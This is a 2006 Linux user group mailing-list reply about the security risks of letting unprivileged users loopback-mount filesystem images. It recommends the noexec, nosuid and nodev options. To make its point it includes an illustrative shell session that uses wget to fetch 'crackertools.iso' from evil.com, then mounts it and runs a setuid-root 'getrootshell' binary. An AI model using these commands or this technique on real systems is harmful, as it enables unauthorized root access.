|
[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]
|
Re: [PLUG] loopback mounting fs images
|
In the message dated: Thu, 16 Nov 2006 17:24:07 EST,
The pithy ruminations from Jeff Abrahamson on
<[PLUG] loopback mounting fs images> were:
=>
=>
=> Mount in general denies its services to non-privileged users unless
=> explicit authorization is made in /etc/fstab.
=>
=> I'd like to be able to mount filesystem images from an already mounted
=> filesystem without having to authorize myself specially. I don't
By "filesystem images from an already mounted filesystem" do you mean that an
image already exists as a file on the machine?
=> think this is possible, but I'm curious (1) if I'm wrong and it is
=> possible, and (2) what the security concerns of this would be as long
=> as mount restricted me to mounting files I own on mount-points I own
=> and didn't permit files in the newly mounted fs to have permissions or
=> ownership that I couldn't otherwise give them.
I don't understand the last part "as long as mount...didn't permit files in the
newly mounted fs to have permissions or ownership that I couldn't otherwise
give them". AFAIK, mount(8) doesn't have that kind of control. You can get some
of what you want with the "nosuid" option, but I don't believe that mount will
change the ownership of files to match the person doing the mounting.
Of course, mount has a gazillion options, depending on the specific filesystem
type that you are mounting, and how well those filesystem semantics translate
to your OS.
You may want to consider FUSE (http://fuse.sourceforge.net/) and the Mountlo
project. [DISCLAIMER]I haven't actually used FUSE.[/DISCLAIMER]
Otherwise, it's all to easy to do:
joeuser% cd /tmp
joeuser% wget -nd http://evil.com/downloads/crackertools.iso
joeuser% mkdir /tmp/mymountpoint
joeuser% mount /tmp/crackertools.iso /tmp/mymountpoint -t iso9660 -o loop=/dev/loop3,blocksize=1024
joeuser% ls -l /tmp/mymountpoint
-rws--x--x 1 root bin 106924 Jan 9 2004 getrootshell
joeuser% /tmp/mymountpoint/getrootshell
joeuser#
[the exercise of gaining root when you own device files is a bit more tricky,
but quite possible].
Seriously, if you're going to permit users to mount file systems,
enforce the "noexec" and "nosuid" and "nodev" options.
Mark
=>
=> Jeff
=>
=> Jeff Abrahamson <http://jeff.purple.com/> +1 215/837-2287
=> GPG fingerprint: 1A1A BA95 D082 A558 A276 63C6 16BF 8C4C 0D1D AE4B
=>
=> --zS7rBR6csb6tI2e1
=> Content-Type: application/pgp-signature; name="signature.asc"
=> Content-Description: Digital signature
=> Content-Disposition: inline
=>
=> -----BEGIN PGP SIGNATURE-----
=> Version: GnuPG v1.4.5 (GNU/Linux)
=>
=> iD8DBQFFXOUHFr+MTA0drksRAgV3AKCMysL0PePFL9XFmUqmwbyvzO2JsgCeMDRN
=> 5MRCf/Ik/yCTcrBIani8CTM=
=> =0zq6
=> -----END PGP SIGNATURE-----
___________________________________________________________________________
Philadelphia Linux Users Group -- http://www.phillylinux.org
Announcements - http://lists.phillylinux.org/mailman/listinfo/plug-announce
General Discussion -- http://lists.phillylinux.org/mailman/listinfo/plug
|
|